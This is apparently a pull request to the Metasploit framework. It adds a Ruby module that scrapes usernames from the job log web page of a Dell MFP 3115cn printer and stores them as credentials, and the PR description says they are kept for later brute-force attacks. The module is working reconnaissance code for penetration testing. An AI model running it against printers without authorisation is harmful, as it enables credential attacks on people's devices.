### PR TITLE
Dell MFP 3115cn username enumerator

### DIFF
--- a/modules/auxiliary/gather/dell_mfp_3115_user_enum.rb
+++ b/modules/auxiliary/gather/dell_mfp_3115_user_enum.rb
@@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => 'Dell MFP 3115n color job username exractor',
+      'Name'           => 'Dell MFP 3115n color job username enumerator',
       'Description'    => %{
-        This module is used to harvests the usernames from the color job log file on a Dell MFP 3115n.
+        This module is used to harvests the usernames from the color job log file on a Dell MFP 3115cn.
       },
       'Author'         =>
         [
@@ -29,8 +29,8 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         OptBool.new('SSL', [true, 'Negotiate SSL for outgoing connections', false]),
-        OptInt.new('RPORT', [ true, 'The target port', 80]),
-        OptInt.new('TIMEOUT', [true, 'Timeout for printer probe', 20])
+        OptInt.new('RPORT', [ true, 'The target port where the printers web admin interface is', 80]),
+        OptInt.new('TIMEOUT', [true, 'Timeout for printer probe. How long we are going to wait before we give up', 20])
 
       ], self.class)
   end

--- a/modules/auxiliary/gather/dell_mfp_3115_user_enum.rb
+++ b/modules/auxiliary/gather/dell_mfp_3115_user_enum.rb
@@ -1,0 +1,133 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/proto/http'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Dell MFP 3115n color job username exractor',
+      'Description'    => %{
+        This module is used to harvests the usernames from the color job log file on a Dell MFP 3115n.
+      },
+      'Author'         =>
+        [
+          'Deral "Percentx" Heiland',
+          'Pete "Bokojan" Arzamendi'
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        OptBool.new('SSL', [true, 'Negotiate SSL for outgoing connections', false]),
+        OptInt.new('RPORT', [ true, 'The target port', 80]),
+        OptInt.new('TIMEOUT', [true, 'Timeout for printer probe', 20])
+
+      ], self.class)
+  end
+
+  def run_host(ip)
+    print_status("Attempting to enumerate usernames from: #{rhost}")
+
+    users = pull_usernames
+    return if users.nil?
+
+    print_status('Finished extracting usernames')
+    usernames = ''
+    unless users.blank?
+      users.each do |user|
+        usernames << user << "\n"
+      end
+    end
+
+    #Woot we got usernames so lets save them.
+    print_good("Found the following users: #{users}")
+    loot_name     = 'dell.mfp.usernames'
+    loot_type     = 'text/plain'
+    loot_filename = 'dell-usernames.text'
+    loot_desc     = 'Dell MFP Username Harvester'
+    p = store_loot(loot_name, loot_type, datastore['RHOST'], usernames, loot_filename, loot_desc)
+    print_status("Credentials saved in: #{p}")
+
+    users.each do | user |
+      register_creds('DELL-HTTP', rhost, '80', user, '')
+    end
+  end
+
+  def pull_usernames
+    usernames = []
+
+    begin
+      res = send_request_cgi(
+      {
+        'uri'       => '/ews/job/log.htm',
+        'method'    => 'GET'
+      }, datastore['TIMEOUT'].to_i)
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      print_error("#{rhost}:#{rport} - Connection failed.")
+      return
+    end
+
+    if res == nil?
+      print_error("#{rhost}:#{rport} - Connection failed.")
+      return false
+    end
+
+    html_body = ::Nokogiri::HTML(res.body)
+    record_total = html_body.xpath('/html/body/table/tr/td/table[3]/tr/td/table/td').length
+    record_loop = (record_total / 10)
+
+    @i = 13
+    print_status('Trying to extract usernames')
+    while record_loop > 0
+      tr_name = html_body.xpath("/html/body/table/tr/td/table[3]/tr/td/table/td[#{@i}]").text
+      unless tr_name.blank?
+        usernames << tr_name.strip
+      end
+
+      @i += 10
+      record_loop -= 1
+    end
+    usernames.uniq!
+  end
+
+  def register_creds(service_name, remote_host, remote_port, username, password)
+    credential_data = {
+      origin_type: :service,
+      module_fullname: self.fullname,
+      workspace_id: myworkspace.id,
+      private_data: password,
+      username: username,
+      password: password
+    }
+
+    service_data = {
+      address: remote_host,
+      port: remote_port,
+      service_name: service_name,
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data.merge!(service_data)
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      workspace_id: myworkspace_id
+    }
+
+    login_data.merge!(service_data)
+    create_credential_login(login_data)
+  end
+end


### PR DESCRIPTION
This module enumerates usernames from the color job log on a Dell MFP 3115cn. The usernames are logged for later use such as brute force attacks. 

Below is an example of the options available in the module.
![dell_mfp-details](https://cloud.githubusercontent.com/assets/3900108/4843651/c3e389fe-6034-11e4-908a-5d01e0b92aef.png)

Testing Steps:
Set RHOSTS to a Dell MFP 3115cn
set RPORT to the printers web admin interface
Set SSL to true if needed.
Run the module and see the usernames get collected. 

Below is an example of the module running and it's output. 
![dell-mfp-username](https://cloud.githubusercontent.com/assets/3900108/4843756/ad275fe6-6035-11e4-8b80-6c06189c0074.png)

Let me know what changes I need to make to the module. :)
